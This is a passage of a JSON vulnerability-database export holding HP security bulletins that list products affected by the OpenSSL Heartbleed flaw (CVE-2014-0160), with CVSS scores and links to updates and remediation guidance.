            "title": "RUCKUS ADVISORY ID 041414: OpenSSL 1.0.1 library&#39;s &quot;Heart bleed&quot; vulnerability - CVE-2014-0160",
            "type": "securityvulns",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            }
        },
        {
            "lastseen": "2018-08-31T11:10:51",
            "bulletinFamily": "software",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04249113\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04249113\r\nVersion: 2\r\n\r\nHPSBMU03009 rev.2 - HP CloudSystem Foundation and Enterprise Software v8.0\r\nrunning OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-16\r\nLast Updated: 2014-05-01\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe .Heartbleed. vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the .Heartbleed. vulnerability.\r\n\r\nNOTE: The .Heartbleed. vulnerability &#40;CVE-2014-0160&#41; is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160, &#40;SSRT101520&#41;\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP CloudSystem Foundation and Enterprise version 8.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n  Reference              Base Vector             Base Score\r\nCVE-2014-0160    &#40;AV:N/AC:L/Au:N/C:P/I:N/A:N&#41;       5.0\r\n===========================================================\r\n             Information on CVSS is documented\r\n            in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability by issuing an update to the CloudSystem\r\nproduct download files. A new version of the CloudSystem Foundation component\r\nis provided, specified as version 8.01. All other CloudSystem download files\r\nremain at version 8.0. The combination of these files available at the link\r\nbelow make up the overall CloudSystem solution.\r\nThe Software Depot download location for CloudSystem Foundation and\r\nEnterprise update is:\r\n\r\nhttps://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber\r\n=Z7550-63210\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 16 April 2014 Initial release\r\nVersion:2 &#40;rev.2&#41; - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel.  For other issues about\r\nthe content of this Security Bulletin, send e-mail to [email protected].\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: [email protected]\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided &quot;as is&quot;\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAlNhmpcACgkQ4B86/C0qfVk78QCg0vzPtB9E34/a5rhQ274UoqYS\r\nKJgAn3mXIarK3gINzgPWgbob0u5+kNnP\r\n=0lrM\r\n-----END PGP SIGNATURE-----\r\n\r\n",
            "edition": 1,
            "modified": "2014-05-02T00:00:00",
            "published": "2014-05-02T00:00:00",
            "id": "SECURITYVULNS:DOC:30526",
            "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30526",
            "title": "[security bulletin] HPSBMU03009 rev.2 - HP CloudSystem Foundation and Enterprise Software v8.0 running OpenSSL, Remote Disclosure of Information",
            "type": "securityvulns",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            }
        },
        {
            "lastseen": "2018-08-31T11:10:51",
            "bulletinFamily": "software",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04272594\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04272594\r\nVersion: 1\r\n\r\nHPSBMU03032 rev.1 - HP Virtual Connect Firmware Smart Components Installer\r\nSoftware running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Virtual\r\nConnect Firmware Smart Components installer software running OpenSSL. This is\r\nthe OpenSSL vulnerability known as &quot;Heartbleed&quot; which could be exploited\r\nremotely resulting in disclosure of information.\r\n\r\nNote: additional information regarding the OpenSSL &quot;Heartbleed&quot; vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101549\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Virtual Connect Firmware Smart Components installer impacted products and\r\nversions\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows v4.10 and v4.20 Smart\r\nComponents installer\r\n\r\nHP BladeSystem c-Class Virtual Connect Support Utility &#40;VCSU&#41; 1.9.0 for Linux\r\nand Windows\r\n\r\nHP Smart Update Manager &#40;SUM&#41; 6.0.0 through 6.3.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n  Reference              Base Vector             Base Score\r\nCVE-2014-0160    &#40;AV:N/AC:L/Au:N/C:P/I:N/A:N&#41;       5.0\r\n===========================================================\r\n             Information on CVSS is documented\r\n            in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability for the impacted HP Virtual Connect\r\nFirmware Smart Components Installer software in the following updates and/or\r\nHP Security Bulletins.\r\n\r\nHP SPP Component\r\n Update Version or HP Security Bulletin\r\n Software Update or Security Bulletin Location\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows Smart Components installer\r\n v4.10B\r\n http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetai\r\nls/?sp4ts.oid=4144085&amp;spf_p.tpst=swdMain&amp;spf_p.prp_swdMain=wsrp-navigationalS\r\ntate&#37;3Didx&#37;253D&#37;257CswItem&#37;253DMTX_da108a1f80f644f79d3dcc8b98&#37;257CswEnvOID&#37;25\r\n3D4168&#37;257CitemLocale&#37;253D&#37;257CswLang&#37;253D&#37;257Cmode&#37;253D&#37;257Caction&#37;253Ddrive\r\nrDocument&amp;javax.portlet.begCacheTok=com.vignette.cachetoken&amp;javax.portlet.end\r\nCacheTok=com.vignette.cachetoken\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows Smart Components installer\r\n v4.20B\r\n http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetai\r\nls/?sp4ts.oid=4144085&amp;spf_p.tpst=swdMain&amp;spf_p.prp_swdMain=wsrp-navigationalS\r\ntate&#37;3Didx&#37;253D&#37;257CswItem&#37;253DMTX_6c1bcbd3c5ae485cb936818973&#37;257CswEnvOID&#37;25\r\n3D4168&#37;257CitemLocale&#37;253D&#37;257CswLang&#37;253D&#37;257Cmode&#37;253D&#37;257Caction&#37;253Ddrive\r\nrDocument&amp;javax.portlet.begCacheTok=com.vignette.cachetoken&amp;javax.portlet.end\r\nCacheTok=com.vignette.cachetoken\r\n\r\nHP BladeSystem c-Class Virtual Connect Support Utility &#40;VCSU&#41;\r\n HPSBMU03023\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04264271\r\n\r\nHP Smart Update Manager &#40;SUM&#41;\r\n HPSBMU02997\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239375\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel.  For other issues about\r\nthe content of this Security Bulletin, send e-mail to [email protected].\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: [email protected]\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided &quot;as is&quot;\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAlNhgGgACgkQ4B86/C0qfVkpbACg9DSqL62MTf5m+QNI1XWC6nfs\r\nqBQAoP7ssN3H3Bu8IacvYEILcwWUNn3E\r\n=tCt+\r\n-----END PGP SIGNATURE-----\r\n\r\n",
            "edition": 1,
            "modified": "2014-05-02T00:00:00",
            "published": "2014-05-02T00:00:00",
            "id": "SECURITYVULNS:DOC:30525",
            "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30525",
            "title": "[security bulletin] HPSBMU03032 rev.1 - HP Virtual Connect Firmware Smart Components Installer Software running OpenSSL, Remote Disclosure of Information",
            "type": "securityvulns",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            }
        },
        {
            "lastseen": "2018-08-31T11:10:51",
            "bulletinFamily": "software",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04272892\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04272892\r\nVersion: 1\r\n\r\nHPSBMU03033 rev.1 - HP Insight Control Software Components running OpenSSL,\r\nRemote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Insight\r\nControl software components running OpenSSL. This is the OpenSSL\r\nvulnerability known as &quot;Heartbleed&quot; which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nNote: additional information regarding the OpenSSL &quot;Heartbleed&quot; vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101550\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Insight Control impacted software component products and versions\r\n\r\nHP Systems Insight Manager v7.2, v7.2.1, v7.2.2, v7.3, and v7.3.1 bundled\r\nwith the following software:\r\n\r\nHP Smart Update Manager &#40;SUM&#41; v6.0.0 through v6.3.0\r\nHP System Management Homepage &#40;SMH&#41; v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\nWMI Mapper for HP Systems Insight Manager v7.2.1, v7.2.2, v7.3, and v7.3.1\r\nHP Version Control Agent &#40;VCA&#41; v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for\r\nWindows\r\nHP Version Control Agent &#40;VCA&#41; v7.2.2, v7.3.0, and v7.3.1 for Linux\r\nHP Version Control Repository Manager &#40;VCRM&#41; v7.2.0, v7.2.1, v7.2.2, v7.3.0,\r\nand v7.3.1 for Windows\r\n\r\nHP System Management Homepage &#40;SMH&#41; v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\n\r\nHP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, and v7.2.2\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n  Reference              Base Vector             Base Score\r\nCVE-2014-0160    &#40;AV:N/AC:L/Au:N/C:P/I:N/A:N&#41;       5.0\r\n===========================================================\r\n             Information on CVSS is documented\r\n            in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability for the impacted HP Insight Control\r\nsoftware components in the following HP Security Bulletins.\r\n\r\nHP Insight Control software components\r\n HP Security Bulletin\r\n Security Bulletin Location\r\n\r\nHP Systems Insight Manager &#40;SIM&#41;\r\n HPSBMU03022\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04263236\r\n\r\nHP Smart Update Manager &#40;SUM&#41;\r\n HPSBMU02997\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239375\r\n\r\nHP System Management Homepage &#40;SMH&#41;\r\n HPSBMU02998\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239372\r\n\r\nWMI Mapper for HP Systems Insight Manager\r\n HPSBMU03013\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04260385\r\n\r\nHP Version Control Agent &#40;VCA&#41; and Version Control Repository Manager &#40;VCRM&#41;\r\non Linux and Windows,\r\n HPSBMU03020\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04262472\r\n\r\nHP Insight Control server deployment\r\n HPSBMU03024\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04267749\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel.  For other issues about\r\nthe content of this Security Bulletin, send e-mail to [email protected].\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: [email protected]\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided &quot;as is&quot;\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAlNhf8kACgkQ4B86/C0qfVnnpwCcD1emgbWP6dG//dmdLN5mR2Rw\r\nKH0AoLcaCs20x8N/G3V6N8e73UmvNcIl\r\n=E+N7\r\n-----END PGP SIGNATURE-----\r\n\r\n",
            "edition": 1,
            "modified": "2014-05-02T00:00:00",
            "published": "2014-05-02T00:00:00",
            "id": "SECURITYVULNS:DOC:30522",
            "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30522",
            "title": "[security bulletin] HPSBMU03033 rev.1 - HP Insight Control Software Components running OpenSSL, Remote Disclosure of Information",
            "type": "securityvulns",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            }
        },
        {
            "lastseen": "2018-08-31T11:10:51",
            "bulletinFamily": "software",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260505\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260505\r\nVersion: 1\r\n\r\nHPSBMU03018 rev.1 - HP Software Asset Manager running OpenSSL, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-21\r\nLast Updated: 2014-04-21\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Software Asset\r\nmanager running OpenSSL. The Heartbleed vulnerability was detected in\r\nspecific OpenSSL versions. OpenSSL is a 3rd party product that is embedded\r\nwith some of HP Software products. This bulletin objective is to notify HP\r\nSoftware customers about products affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability &#40;CVE-2014-0160&#41; is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 &#40;SSRT101529&#41;\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Asset Manager 9.40 &#40;including all patches&#41; HP Cloud System Chargeback 9.40\r\n&#40;including all patches&#41;\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n  Reference              Base Vector             Base Score\r\nCVE-2014-0160    &#40;AV:N/AC:L/Au:N/C:P/I:N/A:N&#41;       5.0\r\n===========================================================\r\n             Information on CVSS is documented\r\n            in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNote: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00863578\r\n\r\nHP recommends following Asset Manager guidelines including the following\r\naction items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application &#40;e.g. operating system, web server, or\r\napplication server&#41; that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 21 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel.  For other issues about\r\nthe content of this Security Bulletin, send e-mail to [email protected].\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: [email protected]\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided &quot;as is&quot;\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAlNWbHwACgkQ4B86/C0qfVl2AgCg+g9OYkOXmavhzO8oNrQAqZEC\r\ngnkAoJ7e9mgEcg6wSdzVzykAsNISIB7E\r\n=v1pz\r\n-----END PGP SIGNATURE-----\r\n\r\n",
            "edition": 1,
            "modified": "2014-05-01T00:00:00",
            "published": "2014-05-01T00:00:00",
            "id": "SECURITYVULNS:DOC:30508",
            "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30508",
            "title": "[security bulletin] HPSBMU03018 rev.1 - HP Software Asset Manager running OpenSSL, Remote Disclosure of Information",
            "type": "securityvulns",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            }
        },
        {
            "lastseen": "2018-08-31T11:10:51",
            "bulletinFamily": "software",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04271396\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04271396\r\nVersion: 1\r\n\r\nHPSBMU03030 rev.1 - HP Service Pack for ProLiant &#40;SPP&#41; Bundled Software\r\nrunning OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Service Pack\r\nfor ProLiant &#40;SPP&#41; bundled software running OpenSSL. This is the OpenSSL\r\nvulnerability known as &quot;Heartbleed&quot; which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nNote: additional information regarding the OpenSSL &quot;Heartbleed&quot; vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101546\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Service Pack for ProLiant &#40;SPP&#41; impacted software products and versions\r\n\r\nHP Onboard Administrator &#40;OA&#41; v4.11 and v4.20\r\n\r\nHP System Management Homepage &#40;SMH&#41; v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\n\r\nHP Integrated Lights-Out 2 &#40;iLO 2&#41; version v2.23 and earlier\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows v4.10 and v4.20 Smart\r\nComponents installer\r\n\r\nHP Smart Update Manager &#40;SUM&#41; v6.0.0 through v6.3.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n  Reference              Base Vector             Base Score\r\nCVE-2014-0160    &#40;AV:N/AC:L/Au:N/C:P/I:N/A:N&#41;       5.0\r\n===========================================================\r\n             Information on CVSS is documented\r\n            in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability for the impacted HP Service Pack for\r\nProLiant &#40;SPP&#41; bundled software in the following updates and/or HP Security\r\nBulletins.\r\n\r\nHP SPP Component\r\n Update Version or HP Security Bulletin\r\n Software Update or Security Bulletin Location\r\n\r\nHP Service Pack for ProLiant &#40;SPP&#41;\r\n Version:2014.02.0 &#40;B&#41;\r\n 